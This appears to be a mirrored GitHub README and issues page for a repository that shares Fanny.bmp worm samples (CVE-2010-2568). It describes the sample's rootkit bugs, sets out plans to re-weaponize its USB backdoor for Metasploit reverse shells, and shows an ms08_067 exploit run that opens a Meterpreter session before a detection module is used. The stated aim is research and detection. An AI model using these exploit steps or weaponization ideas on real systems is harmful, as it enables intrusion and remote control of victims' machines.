Git Product home page Git Product logo

fanny.bmp's Introduction

☣️

- MALWARE AHEAD! IF YOU  DO NOT  KNOW WHAT THAT IS, LEAVE

☣️

FannyBMP or DementiaWheel

I made yet another Branch "only_malware" which ONLY CONTAINS THE FANNY.BMP MALWARE

please find it here only_malware⚠️

rootkit quick overview

image

  • Q: why did I use the 'runas' dialog to demonstrate the rootkit?
  • A: cuz I wanted to show it does work on some text-inputs, as well

And another screenshot:

image

Note! the technical report I wrote has a few* painfully-obvious flaws (like being written in a hurry, so it has some* grammar errors) the report will be re-written and re-publicized as the same with a new version number. This new version, will be much better in general. And more Related to the actual research I did on the malware rather than the malware in general.

I have quite little time on my hands now, so it will be delayd (this is just how I am).

Points

Instead of having all the text (literally, all text) shown all at once, I decided to make clickable points, (if clicking doesn't work, please refer to the raw version of the readme or check it on another device)

the most important things related to this repo is (most notably) My contribution(this repo) to the Rapid7 project(Metasploit);

Basic Info 
Name
            FannyBMP or as the codename, DementiaWheel.

Description
             FannyBMP or as the codename, DementiaWheel
             Is a worm that exploited zero day vulns
             (more specifically, the LNK Exploit CVE-2010-2568).
             Which allowed it to spread (via usb) even if USB Autorun was turned off.
             This is the same(although somewhat more obfuscated) exploit that was used in StuxNet.


References
- https://securelist.com/a-fanny-equation-i-am-your-father-stuxnet/68787


CVE
 - 2010-2568
POC's (Proof Of Concepts)

YouTube infection run

image

Fanny all files completely provided

includes:

☢️ Still unsorted (sorting it at the moment) ☢️

not-done ⚠️

related:

--- please note that documentation(writing) (as below) is not my strongest front; so please this will be fuzzy; hopefully readable. -----

important below

⚠️ this repo has serious issues. (1 major is the lot of Unnec. stuff, like old README (etc), ) Why?! well, when I uploaded this - I did not think this would be interesting for others; so I didn't pay attention to make it "really readable"

⚠️ which I was wrong about (soo wrong) - which is why I will change this very soon as I want this to be as clean as possible;

therefore - please routinely check the 2nd branch (if possible)

as I will upload and make it all very cleanly organized; with screenshots; and everything in one place(or, Hopefully I will be able to at least, make it decently well)

thanks for understanding! have a good day!

MAJOR update coming soon:

I will (when I am done with the OSCP Exam, which is very soon! it actually is on 18th Jan! (writing from 2021 25 Dec (Happy Christmas! :) ))) Soon create & upload the following:

  • Recording (From scratch(0%), to 100%) of when Fanny.bmp infects a PLC (although.. It does not do anything, or even "infects a PLC" but, it detects PLC's in a kinda-similar way StuXNet did.) (although a virtual one, since I have not real access to a nuclear reactor.. For.. well, quite - obvious reasons.
  • Recording (again, From 0 to 100%) of how one can "re-weaponize" Fanny.bmp (or,DementiaWheel as it's codename suggests) the USB-Backdoor to carry commands from & to Metasploit. (This is tested and, let's just say - it works, but needs improvement. (Massive improvements that is)) <- Still working on it.
  • A mini-library written in C (in combination with Lua) to make (the 2 points above ) a bit more user-friendly
  • (JUST so you don't need to be a debugger-professional to understand how to get a reverse shell trough fanny's USB Backdoor for example.)
For the story Refer to both the article(s) I've been provided below, but also - if you're interested; read my theory fanny.bmp's and StuXNet's purpose in the ISSUES page. "The Purpose of Fanny.bmp - in relation to StuXNet #7 "

Related samples: Agent.btz and Stuxnet

Refs:

[+1] video, demonstrating a Re-Creation of fanny.bmp to display a MessageBox(soon cmd)

Note, I have created a new POC video demonstrating fanny.bmp, as well as a bug

(that I do not think is known? At least probably not to the developers that made fanny.bmp, although this is probably quite expected, that it would hide files using the prefix the rootkit is designed to just "hide").

But the unexpected thing was "to me anyway" that, it crashed explorer (and, the whole XP) while doing this.) This is done by "using" the rootkit provided in fanny.bmp.

How to re-create the Crash/bug:

watch the video https://www.youtube.com/watch?v=Uto_lcD2f38 (youtube)

If you name a folder/file/shortcut " _ _ e _ _ . l n k " (Note: Explorer will make the file not-displayed when you type e) and then, hopefully - it will crash with an error message. Or 2 error messages by the way.

POC (Proof Of Concept) Video(s)

The renewed video is here:

https://youtu.be/Uto_lcD2f38

###As well as the video file itself, here: https://github.com/loneicewolf/fanny.bmp/blob/main/ReNewed(Fannybmp%20Winxp%20Poc)%20(With%20Rootkit%20Demo%20%2B%20Bug%20Crash)%20.mp4.7z

The screenshot of the "empty" (not infected by fanny) USB (that, was "experimented" with and later, as well infected by fanny.bmp) Displaying the files that the rootkit tried to hide, but it crashed explorer.exe with 2 error messages instead.

https://github.com/loneicewolf/fanny.bmp/blob/main/SanUltra%20(Fanny.bmp%20Bug).png

2 Error messages from fanny.bmp while it's rootkit was in use (and tried to hide a file/directory created by the user, called "e.lnk" in this example)

https://github.com/loneicewolf/fanny.bmp/blob/main/2Errors(while%20rootkit%20tried%20to%20hide%20__).png

For detection of fanny.bmp infections using MetaSploit,

you can now use my metasploit module avail. here: https://github.com/loneicewolf/metasploit_fanny_check_module/blob/main/fanny_bmp_check.rb

Documentation for

the module avail. here: at the wiki https://github.com/loneicewolf/fanny.bmp/wiki/Docs

POCS

By-OS:

All these I thought of earlier providing, since I was one of the people that got this on my USB stick (my USB got infected long long time ago, Years ago now.) - But now - when I looked closer and I saw that some of these isn't even available online (Some of them are, still - like fanny.bmp and maybe some others, and ECELP4.acm) but not any of mscorwin / comhost, etc. (If they are - I would love to hear that! and the source of it. The more sources of same malware - the better. It strengthens the "community" if I can put it that way. And it is easier to find if all material is gathered at one place. But I thought of providing all of these to malware researchers. As well as for academical purposes.

Note: In the video I provided, I had slight problems with the USB Keyboard. So I wrote "EDUCATIONAK" but meant "EDUCATIONAL". Contact me for any details.

(Q) Why would you want to upload malware? You're literally providing CyberWeapons! (A) I believe in Open-Source, and that even though in this scenario, can hopefully help malware researchers provide better protection.

But the major point, is actually - as said above, but adding the following reason:

  • to help the feature find these malware and samples. As I think there are very little (if not none) of these easily accessible online. (Samples that is)

To Detect fanny, refer to this article:

And (for "optional" reading) I would suggest this one: "AiR-ViBeR: Exfiltrating Data from Air-GappedComputers via Covert Surface ViBrAtIoNs." - writeup about Stuxnet,Fanny, Agent.btz (which is really like each others in ways)

POC:

First, Git clone the fanny_bmp_check.rb from Metasploit! (Now - always go to metasploit (oficially) to get the fanny.bmp module. To always get the latest version of it. In which I believe is vital when we talk security)

place it into your msf folder, (important, check the following step before placing it) usually located in /root/.msf4/modules/

  • make the following folders: (under each other) /post/windows/gather/forensics/ <fanny_bmp_check.rb here>

Start msfconsole

use exploit/windows/smb/ms08_067_netapi

set RHOST and LHOST.

msf6 exploit(windows/smb/ms08_067_netapi) > run

  [*] Started reverse TCP handler on 192.168.122.1:4444 
  [*] 192.168.122.160:445 - Automatically detecting the target...
  [*] 192.168.122.160:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
  [*] 192.168.122.160:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
  [*] 192.168.122.160:445 - Attempting to trigger the vulnerability...
  [*] Sending stage (175174 bytes) to 192.168.122.160
  [*] Meterpreter session 4 opened (192.168.122.1:4444 -> 192.168.122.160:1043) at 2020-12-22 16:55:02 +0100

meterpreter > run post/windows/gather/forensics/fanny_bmp_check

[*] Searching registry on WORKSTATION1 for Fanny.bmp artifacts.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\Driver found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter2 found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter3 found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter8 found in registry.
[*] WORKSTATION1: 4 result(s) found in registry.

fanny.bmp's People

Contributors

loneicewolf avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar

Forkers

patricklightsec 5l1v3r1 launchcodeis127 germancodelover hourglass492 victorzhang-1928 wyzmgmdg ahmedsakrr daedalus1427 fortunateson999

fanny.bmp's Issues

Renewd-poc vid: (+Extra: Demonstrating multiple bugs of fanny.bmp which makes explorer(+ XP) Crash!)

Note: My writing is probably not the optimal,
This text is quite fuzzy. I Will sort it later.

While I was making the new video (avail. here YOUTUBE LINK):

I discovered (or, noticed - so to say) multiple bugs (In fanny.bmp itself) - Ironically enough.. which, maybe or maybe not, is not really well known.

At least not for the devs that made fanny.bmp

Why?

Because..

  • It indicates that, fanny.bmp was probably released when not properly tested.
    (Because if it was, the most basic thing you would do with a rootkit (especially if it is developed by a nation-state, or a sponsored one, or even if it's 1 group, not state-sponsored)

So, The most basic thing you would try with a rootkit, is what?

  • Try to make a file with the prefix that the rootkit is supposed to hide. Did they forget such a basic detail?

I do not know. But if we say that this "bug" or - if it is intentional (Will explain): That, if it would detect that the user, or someone - trying to "discover" the malware, or the worm - by making a file/dir called _ _ e_ _ .lnk (github won't let me format underscores) or "fanny" or something on those lines,

  • Fanny.bmp maybe performed the action:
    Shut down/Crash the OS/Aggressively Unload the rootkit/or a driver

  • Or whatever they now decided to "do". If this was intentional.

  • Note: This is only speculation, I have no proof (other than that it's probably just untested, at least untested in the sense that it crashed my XP vm but did not hide the file/or maybe it did hide it, I don't know)

  • creating such a powerful malware and releasing it without proper testing, Can only lead me to have 2 conclusions: (aside from the intentional XP crash, if it was intentional)

1.

It was released by mistake.

(Someone got "too excited" and wanted to "take a fanny.bmp sample home" trough -ironically enough - a usb drive.. Or something like that. (Uh, for "educational purposes only")....of course..

if this was the case; my answer is:

Facepalm <-- Just, a whole lot of them..

2.

It is not a bug. It's maybe because it is a VM. I have not yet verified this on a real machine with Windows XP on it, although it seems unlikely that this would be the case, I have also noticed that the rootkit does not properly hide the files. At least not for "every" Program in Windows. Explorer - yes. Cmd? Some files yes. But still no (to complete evasion). If you as I show in the new video, typing in the URL-Path bar (while in the USB in explorer) and typing \ you will see the _ _ .lnk files, as well as fanny.bmp. (List view)

You can also detect fanny.bmp, by pressing F5 (Refresh) Multiple times, very fast. You will see small, "blinking" icons/ with no or rarely - the filename on it, but it Gets not-displayed very quickly. And, this - can also lead to a Explorer.exe (and, in some cases - Whole OS) Crash.

Again, I have not yet verified that this indeed is the case because this was tried on a VM.

Defenses

For detection, my metasploit module is designed to detect fanny.bmp artifacts in the Windows Registry, avail. here:

I Will Improve this Git

Hello, I will improve the docs and text / formats in this Git. Feel free if you want to Contribute, to edit or improve anything here.

Thank you for the help!

//William M. Aka loneicewolf

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.